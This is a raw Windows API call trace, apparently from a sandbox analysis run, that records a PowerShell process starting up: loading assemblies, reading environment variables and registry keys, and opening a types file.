	[0522.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0523.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0526.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2d4
	[0526.267] CoCreateGuid (in: pguid=0x24dbd0 | out: pguid=0x24dbd0*(Data1=0x533c2455, Data2=0xfd8e, Data3=0x416e, Data4=([0]=0xa6, [1]=0x74, [2]=0xe6, [3]=0xc1, [4]=0xf7, [5]=0xb, [6]=0xcb, [7]=0x58))) returned 0x0
	[0526.267] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.268] CoTaskMemFree (pv=0x19bb70) 
	[0526.277] WinSqmIsOptedIn () returned 0x0
	[0526.278] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.278] CoTaskMemFree (pv=0x19bb70) 
	[0526.279] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.279] CoTaskMemFree (pv=0x19bb70) 
	[0526.279] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.280] CoTaskMemFree (pv=0x19bb70) 
	[0526.280] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.280] CoTaskMemFree (pv=0x19bb70) 
	[0526.281] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.281] CoTaskMemFree (pv=0x19bb70) 
	[0526.282] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.282] CoTaskMemFree (pv=0x19bb70) 
	[0526.283] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.283] CoTaskMemFree (pv=0x19bb70) 
	[0526.283] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0526.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.283] CoTaskMemFree (pv=0x19bb70) 
	[0527.097] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0527.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.097] CoTaskMemFree (pv=0x19bb70) 
	[0527.102] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0527.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.102] CoTaskMemFree (pv=0x19bb70) 
	[0527.102] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0527.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.103] CoTaskMemFree (pv=0x19bb70) 
	[0527.103] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0527.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.103] CoTaskMemFree (pv=0x19bb70) 
	[0532.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.678] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0532.678] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0532.678] CoTaskMemFree (pv=0x19bb70) 
	[0532.679] CoTaskMemAlloc (cb=0xcc) returned 0x18eaa0
	[0532.679] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18eaa0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0532.679] CoTaskMemFree (pv=0x18eaa0) 
	[0532.679] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d748 | out: phkResult=0x24d748*=0x314) returned 0x0
	[0532.680] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d6cc, lpData=0x0, lpcbData=0x24d6c8*=0x0 | out: lpType=0x24d6cc*=0x2, lpData=0x0, lpcbData=0x24d6c8*=0x6c) returned 0x0
	[0532.680] CoTaskMemAlloc (cb=0x70) returned 0x134340
	[0532.680] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d69c, lpData=0x134340, lpcbData=0x24d698*=0x6c | out: lpType=0x24d69c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d698*=0x6c) returned 0x0
	[0532.680] CoTaskMemFree (pv=0x134340) 
	[0532.680] CoTaskMemAlloc (cb=0xcc) returned 0x18eaa0
	[0532.680] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x18eaa0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0532.680] CoTaskMemFree (pv=0x18eaa0) 
	[0532.680] CoTaskMemAlloc (cb=0xcc) returned 0x18eaa0
	[0532.680] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18eaa0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0532.680] CoTaskMemFree (pv=0x18eaa0) 
	[0532.684] RegCloseKey (hKey=0x314) returned 0x0
	[0532.684] CoTaskMemAlloc (cb=0xcc) returned 0x18eaa0
	[0532.684] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18eaa0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0532.684] CoTaskMemFree (pv=0x18eaa0) 
	[0532.685] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d748 | out: phkResult=0x24d748*=0x314) returned 0x0
	[0532.685] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d6cc, lpData=0x0, lpcbData=0x24d6c8*=0x0 | out: lpType=0x24d6cc*=0x0, lpData=0x0, lpcbData=0x24d6c8*=0x0) returned 0x2
	[0532.685] RegCloseKey (hKey=0x314) returned 0x0
	[0532.688] CoTaskMemAlloc (cb=0x20c) returned 0x184750
	[0532.688] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x184750 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0532.697] CoTaskMemFree (pv=0x184750) 
	[0532.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0532.698] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0532.703] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0532.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.703] CoTaskMemFree (pv=0x19bb70) 
	[0532.705] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0532.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.705] CoTaskMemFree (pv=0x19bb70) 
	[0533.510] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0533.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.510] CoTaskMemFree (pv=0x19bb70) 
	[0533.510] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0533.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.510] CoTaskMemFree (pv=0x19bb70) 
	[0533.512] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d538 | out: phkResult=0x24d538*=0x31c) returned 0x0
	[0533.513] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d54c, lpData=0x0, lpcbData=0x24d548*=0x0 | out: lpType=0x24d54c*=0x1, lpData=0x0, lpcbData=0x24d548*=0x74) returned 0x0
	[0533.513] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d4bc, lpData=0x0, lpcbData=0x24d4b8*=0x0 | out: lpType=0x24d4bc*=0x1, lpData=0x0, lpcbData=0x24d4b8*=0x74) returned 0x0
	[0533.513] CoTaskMemAlloc (cb=0x78) returned 0x134340
	[0533.513] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d48c, lpData=0x134340, lpcbData=0x24d488*=0x74 | out: lpType=0x24d48c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d488*=0x74) returned 0x0
	[0533.513] CoTaskMemFree (pv=0x134340) 
	[0533.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0533.514] SetErrorMode (uMode=0x1) returned 0x1
	[0533.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d410 | out: lpFileInformation=0x24d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0533.514] SetErrorMode (uMode=0x1) returned 0x1
	[0533.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0533.514] SetErrorMode (uMode=0x1) returned 0x1
	[0533.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d410 | out: lpFileInformation=0x24d410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0533.515] SetErrorMode (uMode=0x1) returned 0x1
	[0533.516] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0533.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.516] CoTaskMemFree (pv=0x19bb70) 
	[0533.517] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0533.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.517] CoTaskMemFree (pv=0x19bb70) 
	[0533.518] GetACP () returned 0x4e4
	[0533.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0533.537] SetErrorMode (uMode=0x1) returned 0x1
	[0533.538] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0533.539] GetFileType (hFile=0x320) returned 0x1
	[0533.539] SetErrorMode (uMode=0x1) returned 0x1
	[0533.539] GetFileType (hFile=0x320) returned 0x1
	[0533.541] ReadFile (in: hFile=0x320, lpBuffer=0x3060e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x3060e80*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0533.543] ReadFile (in: hFile=0x320, lpBuffer=0x3060e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x3060e80*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0533.544] ReadFile (in: hFile=0x320, lpBuffer=0x3060e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x3060e80*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0533.544] ReadFile (in: hFile=0x320, lpBuffer=0x3060e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x3060e80*, lpNumberOfBytesRead=0x24d348*=0xcf3, lpOverlapped=0x0) returned 1
	[0533.545] ReadFile (in: hFile=0x320, lpBuffer=0x30602db, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x30602db*, lpNumberOfBytesRead=0x24d348*=0x0, lpOverlapped=0x0) returned 1
	[0533.545] ReadFile (in: hFile=0x320, lpBuffer=0x3060e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x3060e80*, lpNumberOfBytesRead=0x24d348*=0x0, lpOverlapped=0x0) returned 1
	[0533.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0533.547] SetErrorMode (uMode=0x1) returned 0x1
	[0533.547] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d2c0 | out: lpFileInformation=0x24d2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0533.547] SetErrorMode (uMode=0x1) returned 0x1
	[0533.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0533.548] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d3a8 | out: phkResult=0x24d3a8*=0x320) returned 0x0
	[0533.548] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d32c, lpData=0x0, lpcbData=0x24d328*=0x0 | out: lpType=0x24d32c*=0x1, lpData=0x0, lpcbData=0x24d328*=0x56) returned 0x0
	[0533.548] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b1b0
